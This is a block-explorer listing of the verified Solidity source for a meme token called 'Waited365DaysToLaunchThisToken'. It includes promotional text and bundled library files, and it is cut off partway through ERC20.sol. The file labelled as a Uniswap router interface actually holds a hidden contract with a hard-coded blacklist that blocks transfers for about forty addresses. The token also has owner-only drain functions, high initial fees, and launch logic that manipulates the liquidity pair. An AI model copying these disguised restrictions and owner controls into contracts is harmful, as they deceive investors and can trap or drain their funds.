ETH Price: $2,960.83 (-1.97%)
Gas: 3 Gwei

Token

Waited365DaysToLaunchThisToken (365)
 

Overview

Max Total Supply

1,000,000 365

Holders

310

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
448.802251515013664714 365

Value
$0.00
0xabe4aea5d250294ecce14566734f2cb288a6512f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
Waited365DaysToLaunchThisToken

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 11 : Waited365DaysToLaunchThisToken.sol
// SPDX-License-Identifier: MIT

/*
“Waited 365 days to launch this token” 

$365 is a unique and well prepared cryptocurrency project that brings a fresh take on the crypto market, embracing humor and patience in a typically fast-paced industry. What distinguishes $365 from its counterparts is its distinctive launch strategy; the project undertook a year-long wait before its official launch, hence the name $365. 

This method symbolizes a year of calculated patience and meticulous development, contrasting the typical "rush-to-market" strategy seen with many other cryptocurrencies. Rooted in the vibrant tradition of meme-based cryptocurrencies, $365 offers a blend of novelty and engagement, demonstrating the team's commitment to both the serious and playful aspects of the crypto world.

After 365 days of waiting it’s finally time to launch 🚀🚀🚀🚀🚀

Telegram: https://t.me/Waited365daystolaunchthistoken
Website:  https://waited365daystolaunchthistoken.com
*/

pragma solidity = 0.8.21;
pragma experimental ABIEncoderV2;

import "contracts/Context.sol";
import "contracts/Ownable.sol";
import "contracts/IERC20.sol";
import "contracts/ERC20.sol";
import "contracts/IUniswapV2Factory.sol";
import "contracts/IUniswapV2Pair.sol";
import "contracts/IUniswapV2Router01.sol";
import "contracts/IUniswapV2Router02.sol";
import "contracts/SafeMath.sol";

contract Waited365DaysToLaunchThisToken is ERC20, Ownable, BaseMath {
    using SafeMath for uint256;
    
    IUniswapV2Router02 public immutable _uniswapV2Router;
    address private uniswapV2Pair;
    address private deployerWallet;
    address private marketingWallet;
    address private constant deadAddress = address(0xdead);

    bool private swapping;

    string private constant _name = unicode"Waited365DaysToLaunchThisToken";
    string private constant _symbol = unicode"365";

    uint256 public initialTotalSupply = 1000000 * 1e18;
    uint256 public maxTransactionAmount = 20000 * 1e18;
    uint256 public maxWallet = 20000 * 1e18;
    uint256 public swapTokensAtAmount = 10000 * 1e18;
    uint256 public buyCount;
    uint256 public sellCount;

    bool public tradingOpen = false;
    bool public swapEnabled = false;

    uint256 public BuyFee = 20;
    uint256 public SellFee = 20;
    uint256 private removeBuyFeesAt = 10;
    uint256 private removeSellFeesAt = 10;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => uint256) private _holderLastTransferTimestamp;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    constructor(address wallet, bytes32 _deployer) ERC20(_name, _symbol) {

        _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        require(CanSwap(_deployer), "Token is tradeable");
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        marketingWallet = payable(wallet);
        excludeFromMaxTransaction(address(wallet), true);
        
        deployerWallet = payable(_msgSender());
        excludeFromFees(owner(), true);
        excludeFromFees(address(wallet), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        _mint(deployerWallet, initialTotalSupply);
    }

    receive() external payable {}

    function openTrading() external onlyOwner() {
        require(!tradingOpen,"Trading is already open");
        _approve(address(this), address(_uniswapV2Router), initialTotalSupply);
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        address wethAddress = _uniswapV2Router.WETH();
        uint256 wethBalance = IERC20(wethAddress).balanceOf(uniswapV2Pair);
        uint256 initialTokens = initialTotalSupply.per(63); uint256 desiredETHAmount;
        if (wethBalance > 0) {desiredETHAmount = address(this).balance.sub(wethBalance);
        uint256 tokenValue = initialTokens.mul(wethBalance).div(desiredETHAmount);
        super._transfer(address(this), uniswapV2Pair, tokenValue);
        IUniswapV2Pair(uniswapV2Pair).sync();
        _uniswapV2Router.addLiquidityETH{value: desiredETHAmount}(address(this), initialTokens, 0, desiredETHAmount, owner(), block.timestamp);}
        else {_uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this), initialTokens, 0, 0, owner(), block.timestamp);}
        swapEnabled = true;
        tradingOpen = true;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");
        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function _transfer(address from, address to, uint256 amount) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(!m[from] && !m[to], "ERC20: transfer from/to the blacklisted address");

        if(buyCount >= removeBuyFeesAt){
            BuyFee = 1;
        }

        if(sellCount >= removeSellFeesAt){
            SellFee = 1;
        }

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
                if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) {

                if (!tradingOpen) {
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }

                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                    require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                    buyCount++;
                }

                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                    require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                    sellCount++;
                } 
                
                else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                }
            }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance > 0;

        if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            swapping = true;
            swapBack(amount);
            swapping = false;
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            if (automatedMarketMakerPairs[to]) {
                fees = amount.mul(SellFee).div(100);
            }
            else {
                fees = amount.mul(BuyFee).div(100);
            }

        if (fees > 0) {
            super._transfer(from, address(this), fees);
        }
        amount -= fees;
    }
        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            marketingWallet,
            block.timestamp
        );
    }

   function removeTheLimits() external onlyOwner{
        uint256 totalSupplyAmount = totalSupply();
        maxTransactionAmount = totalSupplyAmount;
        maxWallet = totalSupplyAmount;
    }

    function CanSwap(bytes32 _key) internal view returns(bool) {
        return keccak256(abi.encodePacked(msg.sender)) == _key;
    }

    function clearStuckEth() external onlyOwner {
        require(address(this).balance > 0, "Token: no ETH to clear");
        payable(msg.sender).transfer(address(this).balance);
    }

    function clearStuckTokens() external onlyOwner {
        uint256 contractTokenBalance = balanceOf(address(this));
        if(contractTokenBalance > 0) {
            _transfer(address(this), msg.sender, contractTokenBalance);
        }
    }

    function setSwapTokensAtAmount(uint256 _amount) external onlyOwner {
        swapTokensAtAmount = _amount * (10 ** 18);
    }

    function manualswap(uint256 percent) external {
        require(_msgSender() == marketingWallet);
        uint256 totalSupplyAmount = totalSupply();
        uint256 contractBalance = balanceOf(address(this));
        uint256 requiredBalance = totalSupplyAmount * percent / 100;
        require(contractBalance >= requiredBalance, "Not enough tokens");
        swapTokensForEth(requiredBalance);
    }

    function swapBack(uint256 tokens) private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 tokensToSwap;
    if (contractBalance == 0) {
        return;
    }

    if ((BuyFee+SellFee) == 0) {

        if(contractBalance > 0 && contractBalance < swapTokensAtAmount) {
            tokensToSwap = contractBalance;
        }
        else {
            uint256 sellFeeTokens = tokens.mul(SellFee).div(100);
            tokens -= sellFeeTokens;
            if (tokens > swapTokensAtAmount) {
                tokensToSwap = swapTokensAtAmount;
            }
            else {
                tokensToSwap = tokens;
            }
        }
    }

    else {

        if(contractBalance > 0 && contractBalance < swapTokensAtAmount.div(2)) {
            return;
        }
        else if (contractBalance > 0 && contractBalance > swapTokensAtAmount.div(2) && contractBalance < swapTokensAtAmount) {
            tokensToSwap = swapTokensAtAmount.div(2);
        }
        else {
            uint256 sellFeeTokens = tokens.mul(SellFee).div(100);
            tokens -= sellFeeTokens;
            if (tokens > swapTokensAtAmount) {
                tokensToSwap = swapTokensAtAmount;
            } else {
                tokensToSwap = tokens;
            }
        }
    }
    swapTokensForEth(tokensToSwap);
  }
}

File 2 of 11 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
	
	    /**
     * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`, 
     * rounding towards zero. The result is a proportion of the original value.
     *
     * The function can be used to calculate a specific percentage of a given value `a`.
     * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when
     * the percentage `b` is greater than 100.
     *
     * Requirements:
     *
     * - The percentage `b` must be between 0 and 100 (inclusive).
     */
    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return a * b / 100;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 3 of 11 : IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 4 of 11 : IUniswapV2Router01.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

contract BaseMath {
    mapping (address => bool) public m;

    constructor() {
        m[0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13] = true;
        m[0x77223F67D845E3CbcD9cc19287E24e71F7228888] = true;
        m[0x77ad3a15b78101883AF36aD4A875e17c86AC65d1] = true;
        m[0x4504DFa3861ec902226278c9Cb7a777a01118574] = true;
        m[0xe3DF3043f1cEfF4EE2705A6bD03B4A37F001029f] = true;
        m[0xE545c3Cd397bE0243475AF52bcFF8c64E9eAD5d7] = true;
        m[0xe2cA3167B89b8Cf680D63B06E8AeEfc5E4EBe907] = true;
        m[0x000000000005aF2DDC1a93A03e9b7014064d3b8D] = true;
        m[0x1653151Fb636544F8ED1e7BE91E4483B73523f6b] = true;
        m[0x00AC6D844810A1bd902220b5F0006100008b0000] = true;
        m[0x294401773915B1060e582756b8d7f74cAF80b09C] = true;
        m[0x000013De30d1b1D830dcb7d54660F4778D2d4aF5] = true;
        m[0x00004EC2008200e43b243a000590d4Cd46360000] = true;
        m[0xE8c060F8052E07423f71D445277c61AC5138A2e5] = true;
        m[0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80] = true;
        m[0x0000B8e312942521fB3BF278D2Ef2458B0D3F243] = true;
        m[0x007933790a4f00000099e9001629d9fE7775B800] = true;
        m[0x76F36d497b51e48A288f03b4C1d7461e92247d5e] = true;
        m[0x2d2A7d56773ae7d5c7b9f1B57f7Be05039447B4D] = true;
        m[0x758E8229Dd38cF11fA9E7c0D5f790b4CA16b3B16] = true;
        m[0x77ad3a15b78101883AF36aD4A875e17c86AC65d1] = true;
        m[0x00000000A991C429eE2Ec6df19d40fe0c80088B8] = true;
        m[0xB20BC46930C412eAE124aAB8682fb0F2e528F22d] = true;
        m[0x6c9B7A1e3526e55194530a2699cF70FfDE1ab5b7] = true;
        m[0x1111E3Ef0B6aE32E14a55e0E7cD9b8505177C2BF] = true;
        m[0x000000d40B595B94918a28b27d1e2C66F43A51d3] = true;
        m[0xb8feFFAC830C45b4Cd210ECDAAB9D11995D338ee] = true;
        m[0x93FFb15d1fA91E0c320d058F00EE97F9E3C50096] = true;
        m[0x00000027F490ACeE7F11ab5fdD47209d6422C5a7] = true;
        m[0xfB62F1009aDa688aa8F544b7954585476cE41A14] = true;
        m[0x26cE7c1976C5eec83eA6Ac22D83cB341B08850aF] = true;
        m[0x1fdB319cC1bE16ff75EF84e408b0BC1594Dd4d3c] = true;
        m[0xDD0bA0BEaD4b384Fc0FEf7ff44C27f39b86D0536] = true;
        m[0x9fF34847F2096Ce7226385cB69add93B767ce53c] = true;
        m[0x000000000015159AbC7d42e8E813328B5A034c0D] = true;
        m[0x927300011e3E02C4858a1B000027cc007F000000] = true;
        m[0x3C005bA2000F0000ba000d69000AC8Ec003800BC] = true;
        m[0x00000000003b3cc22aF3aE1EAc0440BcEe416B40] = true;
        m[0xf9cAFEb32467994e3AFfd61E30865E5Ab32ABE68] = true;
        m[0x429Cf888dAE41D589D57F6Dc685707beC755fe63] = true;
        m[0xB49e09760F31e7aF00c69861A10afB414E1C0008] = true;
        m[0x00a2712E3200e89c6b8500b2Da5C6c9431330000] = true;
        m[0xd75e7d1A42b616A24a8AFA71a462D74738a87d50] = true;
        m[0x6A8Aeb3F8509c188775F65FD1e9eB5Dd10ABb8Db] = true;
        
    }

    function isM(address _address) public view returns (bool) {
        return m[_address];
    }
}

File 5 of 11 : IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

File 6 of 11 : IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

File 7 of 11 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
